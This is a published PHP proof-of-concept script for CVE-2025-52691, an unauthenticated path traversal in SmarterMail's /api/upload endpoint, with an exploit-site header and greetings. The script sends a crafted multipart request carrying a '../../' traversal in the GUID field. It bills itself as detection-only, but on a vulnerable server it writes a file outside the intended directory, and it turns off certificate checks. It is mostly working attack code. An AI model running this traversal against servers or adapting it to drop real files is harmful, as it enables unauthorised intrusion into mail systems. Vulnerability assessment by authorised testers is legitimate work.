=============================================================================================================================================
| # Title : SmarterMail 16.3.6989.16341 Detection Artifact Generator Unauthenticated Path Traversal vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.smartertools.com/ |
=============================================================================================================================================
[+] Summary: This PHP proof-of-concept is a detection-only artifact generator for CVE-2025-52691 affecting SmarterMail.
It sends a crafted multipart upload request to the /api/upload endpoint, leveraging a path traversal
condition in the contextData GUID to determine whether the target is vulnerable.
The script analyzes HTTP responses and returned JSON keys to classify the target as Vulnerable,
Not Vulnerable (patched), or Unknown, without executing payloads or performing exploitation.
It is intended solely for validation and security assessment purposes.
[+] POC : php poc.php -H https://target.com
<?php
error_reporting(E_ALL);
ini_set('display_errors', 0);
$banner = <<<BANNER
██╗███╗ ██╗██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗██╗ ██╗ █████╗
██║████╗ ██║██╔══██╗██╔═══██╗██║ ██║██╔════╝██║ ██║██║ ██╔╝██╔══██╗
██║██╔██╗ ██║██ █╔╝██║ ██║██║ ██║███████╗███████║█████╔╝ ███████║
██║██║╚██╗██║██╔══██╗██║ ██║██║ ██║╚════██║██╔══██║██╔═██╗ ██╔══██║
██║██║ ╚████║██████╔╝╚██████╔╝╚██████╔╝███████║██║ ██║██║ ██╗██║ ██║
╚═╝╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝
watchTowr-vs-SmarterMail-CVE-2025-52691.php
(*) CVE-2025-52691 Detection Artifact Generator
BANNER;
// Random alphanumeric marker. It is embedded in the GUID so the server's
// response can be matched to this specific probe.
function generateRandomName(int $length = 6): string {
    $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $out = '';
    for ($i = 0; $i < $length; $i++) {
        $out .= $chars[random_int(0, strlen($chars) - 1)];
    }
    return $out;
}

// Send one multipart probe to /api/upload and classify the target from the
// HTTP status code and the JSON body that comes back.
function dag(string $host): void {
    $name = generateRandomName();
    $url = $host . 'api/upload';
    $boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(8));

    // Multipart body. The contextData part carries the traversal sequence in "guid".
    $data = "--{$boundary}\r\n";
    $data .= "Content-Disposition: form-data; name=\"context\"\r\n\r\nattachment\r\n";
    $data .= "--{$boundary}\r\n";
    $data .= "Content-Disposition: form-data; name=\"resumableIdentifier\"\r\n\r\nfakeID\r\n";
    $data .= "--{$boundary}\r\n";
    $data .= "Content-Disposition: form-data; name=\"resumableFilename\"\r\n\r\nfakefile.aspx\r\n";
    $data .= "--{$boundary}\r\n";
    $data .= "Content-Disposition: form-data; name=\"contextData\"\r\n\r\n";
    $data .= "{\"guid\":\"dag/../../{$name}\"}\r\n";
    $data .= "--{$boundary}\r\n";
    $data .= "Content-Disposition: form-data; name=\"whatever\"; filename=\"fake.jpg\"\r\n\r\n";
    $data .= "Detection Artifact Generator\r\n";
    $data .= "--{$boundary}--\r\n";

    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_POST => true,
        CURLOPT_POSTFIELDS => $data,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_HTTPHEADER => [
            "Content-Type: multipart/form-data; boundary={$boundary}",
            "Content-Length: " . strlen($data)
        ],
        // Certificate verification is disabled, so the verdict is only as
        // trustworthy as the network path to the host being assessed.
        CURLOPT_SSL_VERIFYPEER => false,
        CURLOPT_SSL_VERIFYHOST => false,
        CURLOPT_TIMEOUT => 15,
    ]);
    $response = curl_exec($ch);
    $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    if ($response === false || $response === '') {
        echo "[!] Request failed\n";
        return;
    }

    // The body may be a JSON document or a JSON string that itself contains JSON.
    $json = json_decode($response, true);
    if (is_string($json)) {
        $json = json_decode($json, true);
    }
    if (!is_array($json)) {
        echo "[+/-] UNKNOWN MESSAGE - please verify manually\n";
        return;
    }

    // Vulnerable: HTTP 200 and the returned key echoes the random marker.
    // is_string() guards stripos() against a non-string "key" value.
    if ($httpCode === 200 && isset($json['key']) && is_string($json['key'])) {
        if (stripos($json['key'], $name) !== false) {
            echo "[+] VULNERABLE - file " . basename($json['key']) . " got uploaded\n";
            return;
        }
    }

    // Patched: the server rejects the malformed GUID.
    if ($httpCode === 400 && ($json['message'] ?? '') === 'INVALID_GUID') {
        echo "[-] NOT VULNERABLE - patch applied (INVALID_GUID)\n";
        return;
    }

    echo "[+/-] UNKNOWN MESSAGE - please verify manually\n";
}

echo $banner;
$options = getopt("H:", ["host:"]);
if (!isset($options['H']) && !isset($options['host'])) {
    echo "Usage : php poc.php -H <host>\n";
    echo "Example: php poc.php -H https://smartermail.lab/\n";
    exit(1);
}
// Normalise the host so it ends in exactly one trailing slash.
$host = rtrim($options['H'] ?? $options['host'], '/') . '/';
dag($host);
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================